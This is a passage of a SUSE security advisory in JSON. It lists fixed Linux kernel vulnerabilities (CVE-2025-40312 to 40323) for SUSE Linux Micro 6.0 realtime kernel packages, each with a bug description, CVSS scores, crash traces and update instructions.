"url": "https://www.suse.com/security/cve/CVE-2025-40312"
},
{
"category": "external",
"summary": "SUSE Bug 1255046 for CVE-2025-40312",
"url": "https://bugzilla.suse.com/1255046"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40312"
},
{
"cve": "CVE-2025-40314",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40314"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: cdns3: gadget: Use-after-free during failed initialization and exit of cdnsp gadget\n\nIn the __cdnsp_gadget_init() and cdnsp_gadget_exit() functions, the gadget\nstructure (pdev-\u003egadget) was freed before its endpoints.\nThe endpoints are linked via the ep_list in the gadget structure.\nFreeing the gadget first leaves dangling pointers in the endpoint list.\nWhen the endpoints are subsequently freed, this results in a use-after-free.\n\nFix:\nBy separating the usb_del_gadget_udc() operation into distinct \"del\" and\n\"put\" steps, cdnsp_gadget_free_endpoints() can be executed prior to the\nfinal release of the gadget structure with usb_put_gadget().\n\nA patch similar to bb9c74a5bd14(\"usb: dwc3: gadget: Free gadget structure\n only after freeing endpoints\").",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40314",
"url": "https://www.suse.com/security/cve/CVE-2025-40314"
},
{
"category": "external",
"summary": "SUSE Bug 1255072 for CVE-2025-40314",
"url": "https://bugzilla.suse.com/1255072"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40314"
},
{
"cve": "CVE-2025-40315",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40315"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: gadget: f_fs: Fix epfile null pointer access after ep enable.\n\nA race condition occurs when ffs_func_eps_enable() runs concurrently\nwith ffs_data_reset(). The ffs_data_clear() called in ffs_data_reset()\nsets ffs-\u003eepfiles to NULL before resetting ffs-\u003eeps_count to 0, leading\nto a NULL pointer dereference when accessing epfile-\u003eep in\nffs_func_eps_enable() after successful usb_ep_enable().\n\nThe ffs-\u003eepfiles pointer is set to NULL in both ffs_data_clear() and\nffs_data_close() functions, and its modification is protected by the\nspinlock ffs-\u003eeps_lock. And the whole ffs_func_eps_enable() function\nis also protected by ffs-\u003eeps_lock.\n\nThus, add NULL pointer handling for ffs-\u003eepfiles in the\nffs_func_eps_enable() function to fix issues",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40315",
"url": "https://www.suse.com/security/cve/CVE-2025-40315"
},
{
"category": "external",
"summary": "SUSE Bug 1255083 for CVE-2025-40315",
"url": "https://bugzilla.suse.com/1255083"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40315"
},
{
"cve": "CVE-2025-40316",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40316"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/mediatek: Fix device use-after-free on unbind\n\nA recent change fixed device reference leaks when looking up drm\nplatform device driver data during bind() but failed to remove a partial\nfix which had been added by commit 80805b62ea5b (\"drm/mediatek: Fix\nkobject put for component sub-drivers\").\n\nThis results in a reference imbalance on component bind() failures and\non unbind() which could lead to a user-after-free.\n\nMake sure to only drop the references after retrieving the driver data\nby effectively reverting the previous partial fix.\n\nNote that holding a reference to a device does not prevent its driver\ndata from going away so there is no point in keeping the reference.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40316",
"url": "https://www.suse.com/security/cve/CVE-2025-40316"
},
{
"category": "external",
"summary": "SUSE Bug 1254797 for CVE-2025-40316",
"url": "https://bugzilla.suse.com/1254797"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40316"
},
{
"cve": "CVE-2025-40317",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40317"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nregmap: slimbus: fix bus_context pointer in regmap init calls\n\nCommit 4e65bda8273c (\"ASoC: wcd934x: fix error handling in\nwcd934x_codec_parse_data()\") revealed the problem in the slimbus regmap.\nThat commit breaks audio playback, for instance, on sdm845 Thundercomm\nDragonboard 845c board:\n\n Unable to handle kernel paging request at virtual address ffff8000847cbad4\n ...\n CPU: 5 UID: 0 PID: 776 Comm: aplay Not tainted 6.18.0-rc1-00028-g7ea30958b305 #11 PREEMPT\n Hardware name: Thundercomm Dragonboard 845c (DT)\n ...\n Call trace:\n slim_xfer_msg+0x24/0x1ac [slimbus] (P)\n slim_read+0x48/0x74 [slimbus]\n regmap_slimbus_read+0x18/0x24 [regmap_slimbus]\n _regmap_raw_read+0xe8/0x174\n _regmap_bus_read+0x44/0x80\n _regmap_read+0x60/0xd8\n _regmap_update_bits+0xf4/0x140\n _regmap_select_page+0xa8/0x124\n _regmap_raw_write_impl+0x3b8/0x65c\n _regmap_bus_raw_write+0x60/0x80\n _regmap_write+0x58/0xc0\n regmap_write+0x4c/0x80\n wcd934x_hw_params+0x494/0x8b8 [snd_soc_wcd934x]\n snd_soc_dai_hw_params+0x3c/0x7c [snd_soc_core]\n __soc_pcm_hw_params+0x22c/0x634 [snd_soc_core]\n dpcm_be_dai_hw_params+0x1d4/0x38c [snd_soc_core]\n dpcm_fe_dai_hw_params+0x9c/0x17c [snd_soc_core]\n snd_pcm_hw_params+0x124/0x464 [snd_pcm]\n snd_pcm_common_ioctl+0x110c/0x1820 [snd_pcm]\n snd_pcm_ioctl+0x34/0x4c [snd_pcm]\n __arm64_sys_ioctl+0xac/0x104\n invoke_syscall+0x48/0x104\n el0_svc_common.constprop.0+0x40/0xe0\n do_el0_svc+0x1c/0x28\n el0_svc+0x34/0xec\n el0t_64_sync_handler+0xa0/0xf0\n el0t_64_sync+0x198/0x19c\n\nThe __devm_regmap_init_slimbus() started to be used instead of\n__regmap_init_slimbus() after the commit mentioned above and turns out\nthe incorrect bus_context pointer (3rd argument) was used in\n__devm_regmap_init_slimbus(). It should be just \"slimbus\" (which is equal\nto \u0026slimbus-\u003edev). Correct it. The wcd934x codec seems to be the only or\nthe first user of devm_regmap_init_slimbus() but we should fix it till\nthe point where __devm_regmap_init_slimbus() was introduced therefore\ntwo \"Fixes\" tags.\n\nWhile at this, also correct the same argument in __regmap_init_slimbus().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40317",
"url": "https://www.suse.com/security/cve/CVE-2025-40317"
},
{
"category": "external",
"summary": "SUSE Bug 1254796 for CVE-2025-40317",
"url": "https://bugzilla.suse.com/1254796"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40317"
},
{
"cve": "CVE-2025-40318",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40318"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: hci_sync: fix race in hci_cmd_sync_dequeue_once\n\nhci_cmd_sync_dequeue_once() does lookup and then cancel\nthe entry under two separate lock sections. Meanwhile,\nhci_cmd_sync_work() can also delete the same entry,\nleading to double list_del() and \"UAF\".\n\nFix this by holding cmd_sync_work_lock across both\nlookup and cancel, so that the entry cannot be removed\nconcurrently.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40318",
"url": "https://www.suse.com/security/cve/CVE-2025-40318"
},
{
"category": "external",
"summary": "SUSE Bug 1254798 for CVE-2025-40318",
"url": "https://bugzilla.suse.com/1254798"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40318"
},
{
"cve": "CVE-2025-40319",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40319"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Sync pending IRQ work before freeing ring buffer\n\nFix a race where irq_work can be queued in bpf_ringbuf_commit()\nbut the ring buffer is freed before the work executes.\nIn the syzbot reproducer, a BPF program attached to sched_switch\ntriggers bpf_ringbuf_commit(), queuing an irq_work. If the ring buffer\nis freed before this work executes, the irq_work thread may accesses\nfreed memory.\nCalling `irq_work_sync(\u0026rb-\u003ework)` ensures that all pending irq_work\ncomplete before freeing the buffer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40319",
"url": "https://www.suse.com/security/cve/CVE-2025-40319"
},
{
"category": "external",
"summary": "SUSE Bug 1254794 for CVE-2025-40319",
"url": "https://bugzilla.suse.com/1254794"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40319"
},
{
"cve": "CVE-2025-40320",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40320"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix potential cfid UAF in smb2_query_info_compound\n\nWhen smb2_query_info_compound() retries, a previously allocated cfid may\nhave been freed in the first attempt.\nBecause cfid wasn\u0027t reset on replay, later cleanup could act on a stale\npointer, leading to a potential use-after-free.\n\nReinitialize cfid to NULL under the replay label.\n\nExample trace (trimmed):\n\nrefcount_t: underflow; use-after-free.\nWARNING: CPU: 1 PID: 11224 at ../lib/refcount.c:28 refcount_warn_saturate+0x9c/0x110\n[...]\nRIP: 0010:refcount_warn_saturate+0x9c/0x110\n[...]\nCall Trace:\n \u003cTASK\u003e\n smb2_query_info_compound+0x29c/0x5c0 [cifs f90b72658819bd21c94769b6a652029a07a7172f]\n ? step_into+0x10d/0x690\n ? __legitimize_path+0x28/0x60\n smb2_queryfs+0x6a/0xf0 [cifs f90b72658819bd21c94769b6a652029a07a7172f]\n smb311_queryfs+0x12d/0x140 [cifs f90b72658819bd21c94769b6a652029a07a7172f]\n ? kmem_cache_alloc+0x18a/0x340\n ? getname_flags+0x46/0x1e0\n cifs_statfs+0x9f/0x2b0 [cifs f90b72658819bd21c94769b6a652029a07a7172f]\n statfs_by_dentry+0x67/0x90\n vfs_statfs+0x16/0xd0\n user_statfs+0x54/0xa0\n __do_sys_statfs+0x20/0x50\n do_syscall_64+0x58/0x80",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40320",
"url": "https://www.suse.com/security/cve/CVE-2025-40320"
},
{
"category": "external",
"summary": "SUSE Bug 1254793 for CVE-2025-40320",
"url": "https://bugzilla.suse.com/1254793"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40320"
},
{
"cve": "CVE-2025-40321",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40321"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: brcmfmac: fix crash while sending Action Frames in standalone AP Mode\n\nCurrently, whenever there is a need to transmit an Action frame,\nthe brcmfmac driver always uses the P2P vif to send the \"actframe\" IOVAR to\nfirmware. The P2P interfaces were available when wpa_supplicant is managing\nthe wlan interface.\n\nHowever, the P2P interfaces are not created/initialized when only hostapd\nis managing the wlan interface. And if hostapd receives an ANQP Query REQ\nAction frame even from an un-associated STA, the brcmfmac driver tries\nto use an uninitialized P2P vif pointer for sending the IOVAR to firmware.\nThis NULL pointer dereferencing triggers a driver crash.\n\n [ 1417.074538] Unable to handle kernel NULL pointer dereference at virtual\n address 0000000000000000\n [...]\n [ 1417.075188] Hardware name: Raspberry Pi 4 Model B Rev 1.5 (DT)\n [...]\n [ 1417.075653] Call trace:\n [ 1417.075662] brcmf_p2p_send_action_frame+0x23c/0xc58 [brcmfmac]\n [ 1417.075738] brcmf_cfg80211_mgmt_tx+0x304/0x5c0 [brcmfmac]\n [ 1417.075810] cfg80211_mlme_mgmt_tx+0x1b0/0x428 [cfg80211]\n [ 1417.076067] nl80211_tx_mgmt+0x238/0x388 [cfg80211]\n [ 1417.076281] genl_family_rcv_msg_doit+0xe0/0x158\n [ 1417.076302] genl_rcv_msg+0x220/0x2a0\n [ 1417.076317] netlink_rcv_skb+0x68/0x140\n [ 1417.076330] genl_rcv+0x40/0x60\n [ 1417.076343] netlink_unicast+0x330/0x3b8\n [ 1417.076357] netlink_sendmsg+0x19c/0x3f8\n [ 1417.076370] __sock_sendmsg+0x64/0xc0\n [ 1417.076391] ____sys_sendmsg+0x268/0x2a0\n [ 1417.076408] ___sys_sendmsg+0xb8/0x118\n [ 1417.076427] __sys_sendmsg+0x90/0xf8\n [ 1417.076445] __arm64_sys_sendmsg+0x2c/0x40\n [ 1417.076465] invoke_syscall+0x50/0x120\n [ 1417.076486] el0_svc_common.constprop.0+0x48/0xf0\n [ 1417.076506] do_el0_svc+0x24/0x38\n [ 1417.076525] el0_svc+0x30/0x100\n [ 1417.076548] el0t_64_sync_handler+0x100/0x130\n [ 1417.076569] el0t_64_sync+0x190/0x198\n [ 1417.076589] Code: f9401e80 aa1603e2 f9403be1 5280e483 (f9400000)\n\nFix this, by always using the vif corresponding to the wdev on which the\nAction frame Transmission request was initiated by the userspace. This way,\neven if P2P vif is not available, the IOVAR is sent to firmware on AP vif\nand the ANQP Query RESP Action frame is transmitted without crashing the\ndriver.\n\nMove init_completion() for \"send_af_done\" from brcmf_p2p_create_p2pdev()\nto brcmf_p2p_attach(). Because the former function would not get executed\nwhen only hostapd is managing wlan interface, and it is not safe to do\nreinit_completion() later in brcmf_p2p_tx_action_frame(), without any prior\ninit_completion().\n\nAnd in the brcmf_p2p_tx_action_frame() function, the condition check for\nP2P Presence response frame is not needed, since the wpa_supplicant is\nproperly sending the P2P Presense Response frame on the P2P-GO vif instead\nof the P2P-Device vif.\n\n[Cc stable]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40321",
"url": "https://www.suse.com/security/cve/CVE-2025-40321"
},
{
"category": "external",
"summary": "SUSE Bug 1254795 for CVE-2025-40321",
"url": "https://bugzilla.suse.com/1254795"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40321"
},
{
"cve": "CVE-2025-40322",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40322"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfbdev: bitblit: bound-check glyph index in bit_putcs*\n\nbit_putcs_aligned()/unaligned() derived the glyph pointer from the\ncharacter value masked by 0xff/0x1ff, which may exceed the actual font\u0027s\nglyph count and read past the end of the built-in font array.\nClamp the index to the actual glyph count before computing the address.\n\nThis fixes a global out-of-bounds read reported by syzbot.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40322",
"url": "https://www.suse.com/security/cve/CVE-2025-40322"
},
{
"category": "external",
"summary": "SUSE Bug 1255092 for CVE-2025-40322",
"url": "https://bugzilla.suse.com/1255092"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40322"
},
{
"cve": "CVE-2025-40323",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40323"
}
],
"notes": [
{
"category": "general",
